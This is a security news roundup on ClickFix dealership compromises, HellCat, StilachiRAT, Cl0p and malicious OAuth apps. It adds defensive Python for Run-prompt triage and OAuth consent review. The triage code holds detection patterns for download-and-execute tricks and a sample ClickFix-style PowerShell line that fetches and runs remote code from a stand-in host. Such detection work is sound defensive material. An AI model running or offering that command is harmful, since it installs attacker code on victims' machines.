Supply chain attack compromises 100 car dealerships through malicious "ClickFix" code
Over 100 car dealership websites were compromised in a supply chain attack after a third-party provider, LES Automotive, was infected with malicious "ClickFix" code.
Researchers found that all websites using LES Automotive’s services unknowingly delivered a ClickFix page to visitors. The attack tricked users into copying and pasting a malicious command into the Windows Run prompt, allowing attackers to execute SectopRAT malware. This technique has been seen before, including an October 2024 campaign in which a ClickFix variant, disguised as a fake browser update, infected over 6,000 WordPress sites in a single day.
This is the second major supply chain attack in less than a year to affect large numbers of dealerships; the previous one was the CDK attack in June 2024.
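One defender-side check for the technique described above, as an added example rather than anything from the article: Windows keeps the Run-prompt history in the RunMRU registry key, so entries there can be triaged for paste-and-run patterns. The indicator list and the sample entries are constructed for the example.

```python
# Added example (not from the article): triage entries in the Windows
# Run-prompt history (HKCU\...\Explorer\RunMRU) for ClickFix-style pasted
# commands. Explorer stores each entry as "<command>\1" and keeps the
# order in the "MRUList" value. Sample entries below are constructed.
import re

# Indicators typical of paste-and-run lures: hidden interpreter windows,
# encoded commands, script hosts fetching URLs, download-and-execute.
SUSPICIOUS = [
    (re.compile(r"\b(powershell|pwsh)\b.*\s-(e|ec|enc|encodedcommand)\b", re.I),
     "encoded PowerShell"),
    (re.compile(r"\s-(w|win|windowstyle)\s+hidden\b", re.I), "hidden window"),
    (re.compile(r"\b(mshta|wscript|cscript)\b.*https?://", re.I),
     "script host fetching a URL"),
    (re.compile(r"\b(iex|invoke-expression)\b", re.I), "Invoke-Expression"),
    (re.compile(r"\b(curl|irm|iwr|invoke-webrequest|certutil)\b.*https?://", re.I),
     "remote download"),
]

def parse_runmru(values):
    """Return commands most-recent-first from a dict of RunMRU values."""
    cmds = []
    for key in values.get("MRUList", ""):
        raw = values.get(key)
        if raw is None:
            continue
        cmds.append(raw[:-2] if raw.endswith("\\1") else raw)
    return cmds

def flag_entries(cmds):
    """Return (command, [matched indicator labels]) for suspicious entries."""
    hits = []
    for cmd in cmds:
        reasons = [label for rx, label in SUSPICIOUS if rx.search(cmd)]
        if reasons:
            hits.append((cmd, reasons))
    return hits

# Constructed sample: one benign entry and one ClickFix-style paste.
SAMPLE = {
    "MRUList": "ba",
    "a": "notepad\\1",
    "b": 'powershell -w hidden -c "irm http://example.invalid/x | iex"\\1',
}

if __name__ == "__main__":
    for cmd, why in flag_entries(parse_runmru(SAMPLE)):
        print(f"SUSPICIOUS: {cmd}\n  reasons: {', '.join(why)}")
```

On a live host the same functions can be fed values enumerated from the RunMRU key (for example via Python's winreg module); a hit is a prompt for triage, not proof of infection.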
Swiss telecom company Ascom confirms cyberattack by HellCat hacking group targeting Jira servers
Swiss telecommunications company Ascom, with an annual revenue of €299.7 million in 2024, confirmed a cyberattack on its IT infrastructure, with the HellCat hacking group targeting Jira servers worldwide using compromised credentials.
The company stated that attackers breached its technical ticketing system on Sunday but assured that business operations remain unaffected, and no preventive action is required from customers or partners. HellCat claimed responsibility for the attack, saying they stole 44GB of data, including source code, invoices, confidential documents and project details. HellCat has previously targeted major companies like Schneider Electric, Telefónica and Orange Group by exploiting Jira credentials.
Recently, they also breached Jaguar Land Rover’s Jira system, leaking sensitive development logs, tracking data and employee information. They claimed to have stolen a database with a little over 470,000 “unique emails” and more than 780,000 records.
Remote access trojan StilachiRAT steals sensitive data, including credentials and cryptowallets
Researchers have identified a new remote access trojan (RAT) called StilachiRAT, which uses advanced evasion techniques to steal sensitive data from targeted systems.
The malware, discovered in November 2024, can extract credentials, clipboard data, digital wallet information and system details, including BIOS serial numbers and active RDP sessions. It specifically targets cryptocurrency wallet extensions in Google Chrome, such as MetaMask, Trust Wallet and Coinbase Wallet, among others.
StilachiRAT communicates with a command-and-control (C2) server, allowing attackers to execute commands like clearing event logs, shutting down systems, launching applications and stealing passwords. It also employs anti-forensic measures, checking for analysis tools and sandbox environments in order to evade detection.
Cl0p ransomware group uses Cleo file transfer tool to breach data of Western Alliance Bank
Western Alliance Bank is notifying 22,000 customers that their personal data was stolen in a breach linked to Cl0p’s exploitation of vulnerabilities in the Cleo file transfer tool. The attack occurred in October 2024, when attackers exploited a then-unknown vulnerability to access parts of the bank’s systems and steal sensitive files.
By January 2025, the bank confirmed data was compromised, and in February, it determined that stolen information included Social Security numbers, driver’s license details, financial account numbers and tax IDs. Affected individuals are being offered one year of identity protection services, and the breach was reported to the Maine Attorney General’s Office.
Western Alliance disclosed to the SEC that it learned of the breach after stolen data was published online but stated the incident would not materially impact its financial condition. Security experts confirm that Cl0p exploited Cleo vulnerabilities, tracked as CVE-2024-50623 and CVE-2024-55956, to target multiple organizations. In 2025, Cl0p claimed responsibility for 332 unconfirmed attacks, most linked to Cleo’s security flaws, highlighting the ongoing risks of supply chain breaches.
Microsoft 365 accounts targeted by malicious OAuth apps disguised as Adobe and DocuSign apps
Cybercriminals are deploying malicious Microsoft OAuth applications disguised as Adobe and DocuSign apps to compromise Microsoft 365 account credentials.
These highly targeted campaigns involve fraudulent apps such as "Adobe Drive," "Adobe Acrobat" and "DocuSign," which request minimal permissions like "profile," "email" and "openid" to avoid detection. Once granted, attackers gain access to user information, facilitating further targeted attacks.
The phishing emails, sent from compromised accounts of small organizations, have targeted various U.S. and European industries, including government, health care, supply chain and retail sectors. After authorization, users are redirected to malicious landing pages that either harvest Microsoft 365 credentials or distribute malware.
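Because the apps described above request only identity scopes, a consent review that keys on permission breadth would miss them; the following added example (not from the article) instead flags brand-lookalike app names that lack a matching verified publisher. Field names follow Microsoft Graph's servicePrincipal and oauth2PermissionGrant objects, while the expected publisher names and all records are constructed assumptions.

```python
# Added example (not from the article): review OAuth app consent records
# for brand-lookalike apps. Field names follow Microsoft Graph's
# servicePrincipal/oauth2PermissionGrant objects (displayName, appId,
# verifiedPublisher, scope); the records below are constructed.
# The check deliberately does not key on scope breadth, since the
# campaign described above requests only openid/profile/email.

BRANDS = {"adobe": "Adobe Inc.", "docusign": "Docusign Inc."}  # assumed publisher names
IDENTITY_ONLY = {"openid", "profile", "email"}

def lookalike_brand(display_name):
    """Return the brand token an app name imitates, or None."""
    name = display_name.lower()
    for token in BRANDS:
        if token in name:
            return token
    return None

def audit_consents(apps):
    """Return findings for brand-named apps without a matching verified publisher."""
    findings = []
    for app in apps:
        brand = lookalike_brand(app["displayName"])
        if brand is None:
            continue
        publisher = (app.get("verifiedPublisher") or {}).get("displayName")
        if publisher == BRANDS[brand]:
            continue  # verified publisher matches the brand the name claims
        scopes = set(app.get("scope", "").split())
        reason = "unverified publisher" if publisher is None else f"publisher mismatch ({publisher})"
        if scopes and scopes <= IDENTITY_ONLY:
            reason += "; identity-only scopes (low-noise consent)"
        findings.append((app["displayName"], app["appId"], reason))
    return findings

# Constructed records: one legitimate app, two lookalikes, one unrelated app.
SAMPLE_APPS = [
    {"displayName": "Adobe Acrobat", "appId": "00000000-0000-0000-0000-000000000001",
     "verifiedPublisher": {"displayName": "Adobe Inc."}, "scope": "openid profile email Files.Read"},
    {"displayName": "Adobe Drive", "appId": "00000000-0000-0000-0000-000000000002",
     "verifiedPublisher": None, "scope": "openid profile email"},
    {"displayName": "DocuSign", "appId": "00000000-0000-0000-0000-000000000003",
     "verifiedPublisher": {"displayName": "Some Other Ltd"}, "scope": "openid email"},
    {"displayName": "Expense Tracker", "appId": "00000000-0000-0000-0000-000000000004",
     "verifiedPublisher": None, "scope": "openid profile"},
]

if __name__ == "__main__":
    for name, app_id, reason in audit_consents(SAMPLE_APPS):
        print(f"REVIEW: {name} ({app_id}): {reason}")
```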